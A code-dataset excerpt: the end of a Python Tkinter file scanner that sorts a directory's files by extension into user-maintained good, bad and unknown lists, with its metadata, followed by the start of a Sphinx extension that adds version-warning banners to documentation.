file.get_file_consensus()==\"KnownGood\" and listbox==0:\r\n self.add_item_to_listbox(\"KnownGood\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"KnownBad\" and listbox==1:\r\n self.add_item_to_listbox(\"KnownBad\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"Unknown\" and listbox==2:\r\n self.add_item_to_listbox(\"Unknown\",file.get_file_extension(),file.get_number_of_files())\r\n\r\n def open_file_explorer(self,file_location):\r\n file_location=file_location[2:len(file_location):1]\r\n for x in range(len(file_location)-1,0,-1):\r\n if file_location[x]==\"\\\\\":\r\n file_location=file_location[0:x:1]\r\n break\r\n os.startfile(r\"{0}\".format(file_location))\r\n\r\n\r\nclass Progressbar(TkinterWrapper.WindowCanvas):\r\n def __init__(self,frame,length,height):\r\n self.length=length\r\n self.height=height\r\n self.percentage=0\r\n self.rectangle_point=0\r\n super(Progressbar, self).__init__(frame,self.length,height)\r\n super(Progressbar, self).pack_canvas(\"top\",0,0)\r\n\r\n def update(self,percentage,part,total_parts):\r\n self.percentage=percentage\r\n super(Progressbar, self).delete_all_contents()\r\n self.update_part(part,total_parts)\r\n self.update_rectangle()\r\n self.update_text()\r\n self.canvas.update()\r\n\r\n def update_part(self,part,total_parts):\r\n super(Progressbar, self).add_text(self.length/2,6,\"Part {0} of {1}\".format(part,total_parts),\"grey10\",\"times 9\")\r\n\r\n def update_rectangle(self):\r\n super(Progressbar, self).add_rectangle(2,13,self.length,self.height,\"lightblue\")\r\n if self.percentage==\"GoThrough\":\r\n self.calculate_go_through_rectangle()\r\n super(Progressbar, self).add_rectangle(self.rectangle_point,13,self.rectangle_point+100,self.height,\"cornflowerblue\")\r\n else:\r\n self.rectangle_point=self.length*self.percentage\r\n super(Progressbar, self).add_rectangle(2,13,self.rectangle_point,self.height,\"cornflowerblue\")\r\n\r\n def calculate_go_through_rectangle(self):\r\n if self.rectangle_point>=self.length:\r\n self.rectangle_point=0\r\n else:\r\n self.rectangle_point+=0.05\r\n \r\n def update_text(self):\r\n if type(self.percentage).__name__!='str':\r\n if self.percentage<=0.95:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey10\",\"times 14\")\r\n else:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey80\",\"times 14\")\r\n\r\n \r\nclass Scan(object):\r\n def __init__(self,directory,scan_gui):\r\n self.scan_directory=directory\r\n self.scan_gui=scan_gui\r\n self.set_scan_variables()\r\n self.known_good_filetypes=saved_information.get_known_good_filetypes()\r\n self.known_bad_filetypes=saved_information.get_known_bad_filetypes()\r\n \r\n def set_scan_variables(self):\r\n self.current_directory=\"\"\r\n self.scaned_files=0\r\n self.file_extensions=[]\r\n self.file_type_object_list=[]\r\n \r\n def start(self):\r\n self.set_scan_variables()\r\n self.set_number_of_files()\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n for name in files:\r\n self.current_directory=\"{0}\\\\{1}\".format(root,name)\r\n self.scan_file(root,name)\r\n self.update_scan_gui(2)\r\n\r\n def set_number_of_files(self):\r\n print(self.scan_directory)\r\n self.number_of_files=0\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n self.number_of_files+=len(files)\r\n self.update_scan_gui(1)\r\n print(\"Number of files: {0}\".format(self.number_of_files))\r\n\r\n def scan_file(self,root,file):\r\n file_name,file_extension=os.path.splitext(\"{0}\".format(file))\r\n self.append_file_type(file_extension)\r\n self.update_file_type_object_list(root,file_extension,file_name)\r\n self.scaned_files+=1\r\n\r\n def append_file_type(self,file_extension):\r\n if file_extension not in self.file_extensions:\r\n self.file_extensions.append(file_extension)\r\n\r\n def update_file_type_object_list(self,file_path,file_extension,file_name):\r\n for item in self.file_type_object_list:\r\n if item.get_file_extension()==file_extension:\r\n item.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n break\r\n else:\r\n self.check_file_type_and_add_to_list(file_path,file_extension,file_name)\r\n\r\n def check_file_type_and_add_to_list(self,file_path,file_extension,file_name):\r\n if file_extension in self.known_good_filetypes:\r\n initilizer=\"KnownGood\"\r\n elif file_extension in self.known_bad_filetypes:\r\n initilizer=\"KnownBad\"\r\n else:\r\n initilizer=\"Unknown\"\r\n new_file_type=FileType(file_extension,initilizer)\r\n new_file_type.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n self.file_type_object_list.append(new_file_type)\r\n\r\n def update_scan_gui(self,part):\r\n if part==1:\r\n percent=\"GoThrough\"\r\n elif part==2:\r\n percent=self.scaned_files/self.number_of_files\r\n self.scan_gui.update_current_information(self.scaned_files,self.number_of_files,self.current_directory)\r\n self.scan_gui.update_progress_bar(percent,part,2)\r\n self.scan_gui.update_file_lists(self.file_type_object_list)\r\n\r\n\r\nclass FileType(object):\r\n def __init__(self,file_extension,file_consensus):\r\n self.file_extension=file_extension\r\n self.file_consensus=file_consensus\r\n self.file_type_locations=[]\r\n\r\n def get_file_extension(self):\r\n return self.file_extension\r\n def get_file_consensus(self):\r\n return self.file_consensus\r\n def get_number_of_files(self):\r\n return len(self.file_type_locations)\r\n def get_file_type_locations(self):\r\n return self.file_type_locations\r\n \r\n def add_file_to_list(self,file_path):\r\n self.file_type_locations.append(\"{0}{1}\".format(file_path,self.file_extension))\r\n\r\n def print_information(self):\r\n print(\"File extenstion: {0}\".format(self.file_extension))\r\n for item in self.file_type_locations:\r\n print(\" -> {0}\".format(item),end=\"\")\r\n print(\"\\t{0:7s} Consensus: {1}\".format(\"\",self.file_consensus))\r\n \r\n\r\nclass FileTypeEditor(object):\r\n def __init__(self,parrent_window,edit_type):\r\n self.edit_type=edit_type\r\n self.set_file_type_list()\r\n self.window=TkinterWrapper.DialogBox(parrent_window,\"Edit {0} File Types\".format(edit_type))\r\n self.__setup_window()\r\n self.__setup_frames()\r\n self.__setup_left_frame()\r\n self.__setup_right_frame()\r\n self.__setup_bottom_frame()\r\n self.update_listbox_text()\r\n\r\n def set_file_type_list(self):\r\n if self.edit_type==\"KnownGood\":\r\n self.file_type_list=saved_information.get_known_good_filetypes()\r\n elif self.edit_type==\"KnownBad\":\r\n self.file_type_list=saved_information.get_known_bad_filetypes()\r\n self.delete_list=[]\r\n self.append_list=[]\r\n \r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n self.window.bind_action(\"\",self.add_file_type)\r\n\r\n def __setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.left_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n self.right_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n for item in [[self.top_frame,\"top\"],[self.left_frame,\"left\"],[self.right_frame,\"right\"],\r\n [self.bottom_frame,\"bottom\"]]:\r\n item[0].pack_frame(item[1],1,0)\r\n self.left_frame.configure_border(\"ridge\",2)\r\n\r\n def __setup_right_frame(self):\r\n self.file_type_listbox=TkinterWrapper.WindowListbox(self.right_frame.get_frame())\r\n self.file_type_listbox.configure_size(20,10)\r\n self.file_type_listbox.pack_listbox(\"left\",0,0)\r\n y_scrollbar=TkinterWrapper.WindowScrollbar(self.right_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(self.file_type_listbox.get_listbox())\r\n self.file_type_listbox.attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_left_frame(self):\r\n self.insert_explanitory_label(self.left_frame.get_frame(),\"Enter File Extension to Add:\")\r\n self.__setup_entry_frame()\r\n self.insert_explanitory_label(self.left_frame.get_frame(),\"Select a File Extension to Delete\")\r\n self.insert_button(self.left_frame.get_frame(),\"Delete\",self.delete_file_type,\"top\")\r\n self.error_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n self.error_frame.pack_frame(\"top\",0,0)\r\n \r\n def __setup_entry_frame(self):\r\n entry_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n entry_frame.pack_frame(\"top\",0,0)\r\n self.file_type_entry=TkinterWrapper.WindowEntry(entry_frame.get_frame())\r\n self.file_type_entry.configure_size(20)\r\n self.file_type_entry.pack_entry(\"left\",0,2)\r\n self.insert_button(entry_frame.get_frame(),\"Add\",self.add_file_type,\"left\")\r\n\r\n def __setup_bottom_frame(self):\r\n self.insert_button(self.bottom_frame.get_frame(),\"Cancel\",partial(self.window.destroy_window,False),\"left\")\r\n self.insert_button(self.bottom_frame.get_frame(),\"Save\",self.save_all_file_types_and_exit,\"left\")\r\n\r\n def insert_explanitory_label(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,text)\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,10)\r\n\r\n def insert_button(self,frame,button_text,button_action,side):\r\n button=TkinterWrapper.WindowButton(frame,button_text,button_action)\r\n button.pack_button(side,2,2)\r\n\r\n def add_file_type(self,*args):\r\n new_file_type=self.file_type_entry.get_entry()\r\n if len(new_file_type)>0 and new_file_type[0]==\".\" and (new_file_type not in self.file_type_list):\r\n self.file_type_list.append(new_file_type)\r\n self.append_list.append(new_file_type)\r\n self.update_listbox_text()\r\n self.file_type_entry.configure_entry_text(\"\")\r\n else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please enter a valid file type\")\r\n self.file_type_entry.select_range(0,\"end\")\r\n \r\n def delete_file_type(self):\r\n selection=self.file_type_listbox.get_current_selection()\r\n selection=self.file_type_listbox.get_text_from_index(selection)\r\n if selection!=None:\r\n for x in range(0,len(self.file_type_list)):\r\n if self.file_type_list[x]==selection:\r\n self.delete_list.append(self.file_type_list[x])\r\n del(self.file_type_list[x])\r\n break\r\n self.update_listbox_text()\r\n else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please select a file to delete\")\r\n \r\n def update_listbox_text(self):\r\n self.file_type_listbox.delete_text(0,\"end\")\r\n for item in self.file_type_list:\r\n self.file_type_listbox.insert_text(\"{0}\\n\".format(item),\"end\")\r\n\r\n def save_all_file_types_and_exit(self):\r\n for item in self.delete_list:\r\n saved_information.delete_file_type(self.edit_type,item)\r\n for item in self.append_list:\r\n saved_information.add_file_type(self.edit_type,item)\r\n self.window.destroy_window(False)\r\n\r\n \r\nclass SetDirWindow(object):\r\n def __init__(self,parent_window):\r\n self.window=TkinterWrapper.DialogBox(parent_window,\"Choose Folder\")\r\n self.directory_to_search=\"\"\r\n self.__setup_window()\r\n self.__setup_frames()\r\n self.__setup_information_frame()\r\n self.__setup_directory_frame()\r\n self.__setup_button_frame()\r\n self.window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n\r\n def __setup_frames(self):\r\n self.information_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.directory_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.button_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.information_frame.pack_frame(\"top\",0,0)\r\n self.directory_frame.pack_frame(\"top\",0,0)\r\n self.button_frame.pack_frame(\"top\",0,0)\r\n\r\n def __setup_information_frame(self):\r\n description_label=TkinterWrapper.WindowLabel(self.information_frame.get_frame(),\"\")\r\n description_label.configure_text(\"Please chose a file to search from the list below:\")\r\n description_label.configure_colors(\"grey20\",\"grey95\",\"times 11\")\r\n description_label.pack_label(\"top\",0,5)\r\n\r\n def __setup_directory_frame(self):\r\n self.__setup_directory_entry_frame()\r\n self.__setup_directory_listbox_frame()\r\n\r\n def __setup_directory_entry_frame(self):\r\n directory_entry_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_entry_frame.pack_frame(\"top\",0,0)\r\n current_directory_label=TkinterWrapper.WindowLabel(directory_entry_frame.get_frame(),\"Current Directory:\\n\")\r\n current_directory_label.pack_label(\"left\",0,0)\r\n current_directory_label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n self.current_directory_entry=TkinterWrapper.WindowEntry(directory_entry_frame.get_frame())\r\n self.current_directory_entry.configure_size(65)\r\n self.current_directory_entry.pack_entry(\"top\",0,0)\r\n x_scrollbar=TkinterWrapper.WindowScrollbar(directory_entry_frame.get_frame(),\"x\")\r\n x_scrollbar.attach_to_widget(self.current_directory_entry.get_entry_widget())\r\n self.current_directory_entry.attach_scrollbar(x_scrollbar.get_scrollbar())\r\n x_scrollbar.pack_scrollbar(\"bottom\",0,0)\r\n\r\n def __setup_directory_listbox_frame(self):\r\n directory_listbox_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_listbox_frame.pack_frame(\"top\",0,0)\r\n self.dir_listbox=DirectoryListbox(directory_listbox_frame.get_frame(),self.current_directory_entry)\r\n\r\n def __setup_button_frame(self):\r\n self.search_button=TkinterWrapper.WindowButton(self.button_frame.get_frame(),\"Scan\",self.set_directory_and_destory_window)\r\n self.search_button.pack_button(\"top\",0,0)\r\n\r\n def set_directory_and_destory_window(self):\r\n self.directory_to_search=self.current_directory_entry.get_entry()\r\n print(\"Directory to scan: \"+self.directory_to_search)\r\n self.window.destroy_window(True)\r\n def get_saved_directory(self):\r\n return self.directory_to_search\r\n \r\n\r\n#Might have to split up into two classes: DirectoryListboxFormating and DirectoryListboxActions\r\nclass DirectoryListbox(TkinterWrapper.WindowListbox):\r\n def __init__(self,frame,companion_text_entry):\r\n self.frame=frame\r\n self.selections=[\"\",\"\"]\r\n self.current_directory_entry=companion_text_entry\r\n self.computer_directory=ComputerDirectory()\r\n self.__setup_listbox_frame()\r\n self.__setup_error_frame()\r\n self.insert_harddrives()\r\n self.start_checking_for_selection()\r\n\r\n def __setup_listbox_frame(self):\r\n self.listbox_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.listbox_frame.pack_frame(\"top\",0,0)\r\n super(DirectoryListbox, self).__init__(self.listbox_frame.get_frame())\r\n super(DirectoryListbox, self).pack_listbox(\"left\",0,0)\r\n super(DirectoryListbox, self).configure_size(80,10)\r\n self.__setup_scrollbar()\r\n def __setup_scrollbar(self):\r\n y_scrollbar=TkinterWrapper.WindowScrollbar(self.listbox_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(super(DirectoryListbox, self).get_listbox())\r\n super(DirectoryListbox, self).attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_error_frame(self):\r\n self.error_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.error_frame.pack_frame(\"top\",0,0)\r\n\r\n def insert_harddrives(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for harddrive in self.computer_directory.get_harddrives():\r\n print(harddrive)\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(RIGHT_TRIANGLE,harddrive),\"end\")\r\n\r\n def start_checking_for_selection(self):\r\n self.selections[0]=super(DirectoryListbox, self).get_current_selection()\r\n self.selections[0]=super(DirectoryListbox, self).get_text_from_index(self.selections[0])\r\n if self.selections[0]!=self.selections[1] and self.selections[0]!=None:\r\n print(\"Selection changed to: {0}\".format(self.selections[0]))\r\n self.selection_actions()\r\n self.selections[1]=self.selections[0]\r\n self.frame.after(250,self.start_checking_for_selection)\r\n\r\n def selection_actions(self):\r\n if RIGHT_TRIANGLE in self.selections[0]:\r\n self.go_to_subdirectory()\r\n elif LEFT_TRIANGLE in self.selections[0]:\r\n self.go_up_directory()\r\n\r\n def go_to_subdirectory(self):\r\n self.computer_directory.set_current_directory(self.get_rid_of_arrows_in_directory(self.selections[0]))\r\n subdirectories=self.computer_directory.get_sub_directories()\r\n if subdirectories!=\"ACCESS DENIED\":\r\n self.update_directory_entry()\r\n self.add_directional_information()\r\n for subdirectory in subdirectories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,subdirectory),\"end\")\r\n else:\r\n error_message=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Access to file was denied.\")\r\n self.go_up_directory()\r\n print(\"Access to file denied\")\r\n\r\n def add_directional_information(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} Back to {1}\\n\".format(LEFT_TRIANGLE,self.computer_directory.get_previous_directory()),\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(DOWN_TRIANGLE,self.computer_directory.get_current_directory()),\"end\")\r\n\r\n def get_rid_of_arrows_in_directory(self,directory):\r\n for x in range(0,len(directory)):\r\n if (directory[x]!=RIGHT_TRIANGLE and directory[x]!=DOWN_TRIANGLE and directory[x]!=LEFT_TRIANGLE)\\\r\n and ((x!=1 or x!=2 or x!=3) and (directory[x]!=\" \")):\r\n directory=directory[x:len(directory):1]\r\n break\r\n return directory\r\n\r\n def go_up_directory(self):\r\n self.computer_directory.trim_from_current_directory(1)\r\n self.update_directory_entry()\r\n new_directories=self.computer_directory.get_sub_directories()\r\n if new_directories!=self.computer_directory.get_harddrives():\r\n self.add_directional_information()\r\n else:\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for new_directory in new_directories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,new_directory),\"end\")\r\n\r\n def update_directory_entry(self):\r\n self.current_directory_entry.configure_entry_text(self.computer_directory.get_formated_current_directory())\r\n \r\n \r\nclass ComputerDirectory(object):\r\n def __init__(self):\r\n self.harddrives=[]\r\n self.current_directory=[]\r\n self.formated_current_directory=\"\"\r\n self.find_harddrives()\r\n\r\n def find_harddrives(self):\r\n self.harddrives=[\"{0}:\".format(drive) for drive in ALAPHABET if os.path.exists(\"{0}:\\\\\".format(drive))]\r\n def get_harddrives(self):\r\n return self.harddrives\r\n\r\n def set_current_directory(self, directory):\r\n self.current_directory.append(\"{0}\\\\\".format(directory))\r\n self.set_formated_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def get_current_directory(self):\r\n return self.current_directory[len(self.current_directory)-1]\r\n def get_previous_directory(self):\r\n if len(self.current_directory)==1:\r\n return \"Hard drives\"\r\n else:\r\n return self.current_directory[(len(self.current_directory)-1)-1]\r\n\r\n def trim_from_current_directory(self,number_of_levels):\r\n self.delete_last_directories(number_of_levels)\r\n self.set_formated_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def delete_last_directories(self,number_of_levels):\r\n for x in range(0,len(self.current_directory)):\r\n if len(self.current_directory)-x<=number_of_levels:\r\n del(self.current_directory[x])\r\n break\r\n print(self.current_directory)\r\n\r\n def get_sub_directories(self):\r\n if len(self.current_directory)==0:\r\n return self.harddrives\r\n else:\r\n try:\r\n os.listdir(self.formated_current_directory)\r\n except:\r\n print(\"Error opening file\")\r\n return \"ACCESS DENIED\"\r\n else:\r\n sub_directories=[sub_dir for sub_dir in os.listdir(self.formated_current_directory) if os.path.isdir(os.path.join(self.formated_current_directory, sub_dir))]\r\n print(sub_directories)\r\n return sub_directories\r\n \r\n def set_formated_current_directory(self):\r\n self.formated_current_directory=\"\"\r\n for x in range(0,len(self.current_directory)):\r\n self.formated_current_directory=\"{0}{1}\".format(self.formated_current_directory,self.current_directory[x])\r\n print(\"Formated Cur Dir: \"+self.formated_current_directory)\r\n def get_formated_current_directory(self):\r\n return self.formated_current_directory\r\n\r\n\r\nclass SavedInfo(object):\r\n def __init__(self):\r\n self.known_good_file=FileWrapper.File(os.curdir,\"KnownGoodFiletypes.txt\")\r\n self.known_bad_file=FileWrapper.File(os.curdir,\"KnownBadFiletypes.txt\")\r\n self.__setup_filetypes()\r\n self.directory_to_scan=\"\"\r\n\r\n def __setup_filetypes(self):\r\n self.known_good_filetypes=self.known_good_file.read_lines(0,'end')\r\n self.known_bad_filetypes=self.known_bad_file.read_lines(0,'end')\r\n\r\n def get_known_good_filetypes(self):\r\n good_file_types=self.known_good_filetypes\r\n return good_file_types[0:len(good_file_types)]\r\n def get_known_bad_filetypes(self):\r\n bad_file_types=self.known_bad_filetypes\r\n return bad_file_types[0:len(bad_file_types)]\r\n\r\n def add_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n self.known_good_filetypes.append(file_type)\r\n elif file_consensus==\"KnownBad\":\r\n self.known_bad_filetypes.append(file_type)\r\n def delete_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n file_list=self.known_good_filetypes\r\n elif file_consensus==\"KnownBad\":\r\n file_list=self.known_bad_filetypes\r\n for x in range(0,len(file_list)):\r\n if file_list[x]==file_type:\r\n del(file_list[x])\r\n break\r\n \r\n def set_directory_to_scan(self,new_directory):\r\n self.directory_to_scan=new_directory\r\n def get_directory_to_scan(self):\r\n return self.directory_to_scan\r\n\r\n def save_info_to_file(self):\r\n self.known_good_file.delete_all_file_contents()\r\n self.known_bad_file.delete_all_file_contents()\r\n for item in self.known_good_filetypes:\r\n self.known_good_file.append_line_to_file(item)\r\n for item in self.known_bad_filetypes:\r\n self.known_bad_file.append_line_to_file(item)\r\n\r\n def close_all_files(self):\r\n self.known_good_file.close_file()\r\n self.known_bad_file.close_file()\r\n\r\n\r\n\r\ndef main():\r\n application_window=AppWindow()\r\n print(\"here\")\r\n saved_information.save_info_to_file()\r\n saved_information.close_all_files()\r\nsaved_information=SavedInfo()\r\nmain()\r\n", "sub_path": "FileScanner.pyw", "file_name": "FileScanner.pyw", "file_ext": "pyw", "file_size_in_byte": 42493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "TkinterWrapper.Window", "line_number": 40, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenu", "line_number": 53, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 54, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 56, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 57, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 58, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 89, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 94, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 98, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 101, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 138, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 140, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 162, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 174, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 176, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 179, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 186, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 188, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 205, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 209, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 210, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 215, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 217, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 219, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 340, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowCanvas", "line_number": 343, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 403, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 418, "usage_type": "call"}, {"api_name": "os.path", "line_number": 418, "usage_type": "attribute"}, {"api_name": "TkinterWrapper.DialogBox", "line_number": 485, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 508, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 509, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 510, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 517, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 520, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 530, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 534, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 536, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 542, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 546, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 551, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 562, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 576, "usage_type": "call"}, {"api_name": "TkinterWrapper.DialogBox", "line_number": 593, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 607, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 608, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 609, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 615, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 625, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 627, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 630, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 633, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 644, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 656, "usage_type": "attribute"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 668, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 675, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 681, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 714, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 754, "usage_type": "call"}, {"api_name": "os.path", "line_number": 754, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 788, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path", "line_number": 793, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 793, "usage_type": "call"}, {"api_name": "FileWrapper.File", "line_number": 808, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 808, "usage_type": "attribute"}, {"api_name": "FileWrapper.File", "line_number": 809, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 809, "usage_type": "attribute"}]} +{"seq_id": "151057337", "text": "# -*- coding: utf-8 -*-\n\nfrom docutils import nodes, core\nfrom munch import Munch\nimport os\n\nfrom .readthedocs import ReadTheDocsAPI\n\nUSE_READTHEDOCS_API = os.environ.get('USE_READTHEDOCS_API', False)\n\n\nclass VersionWarningBanner(object):\n\n ADMONITION_TYPES = {\n 'warning': nodes.warning,\n 'note': nodes.note,\n 'admonition': nodes.admonition,\n }\n\n def __init__(self, app, doctree):\n self.app = app\n self.doctree = doctree\n self.api = self._get_api()\n\n def get_banner_node(self):\n current_version_slug = self._current_doc_version_slug\n newest_version = self._latest_doc_version\n message = self._get_message(current_version_slug)\n banner = self._create_banner_node(message, newest_version)\n return banner\n\n def _get_api(self):\n if USE_READTHEDOCS_API:\n return ReadTheDocsAPI(self._project_slug)\n\n def _create_banner_node(self, message, newest_version, admonition_type='warning'):\n \"\"\"\n Return an admonition node to be inserted in the document.\n\n :rtype: docutils.nodes.admonition\n \"\"\"\n\n if (\n (\n (USE_READTHEDOCS_API and self.api.is_highest_version(self._current_doc_version_slug)) or\n newest_version.slug == self._current_doc_version_slug\n ) and self._current_doc_version_slug not in self.app.config.versionwarning_messages\n ):\n return None\n\n node_class = self.ADMONITION_TYPES.get(\n admonition_type,\n self.ADMONITION_TYPES.get(self._default_admonition_type),\n )\n\n if self._message_placeholder in message:\n message = message.replace(self._message_placeholder, '`{text} `_'.format(\n text=newest_version.slug,\n url=newest_version.url,\n ))\n paragraph = core.publish_doctree(message)[0]\n\n banner_node = node_class(ids=[self._banner_id_div])\n banner_node.append(paragraph)\n return banner_node\n\n @property\n def _banner_id_div(self):\n return self.app.config.versionwarning_banner_id_div\n\n @property\n def _project_slug(self):\n return self.app.config.versionwarning_project_slug\n\n @property\n def 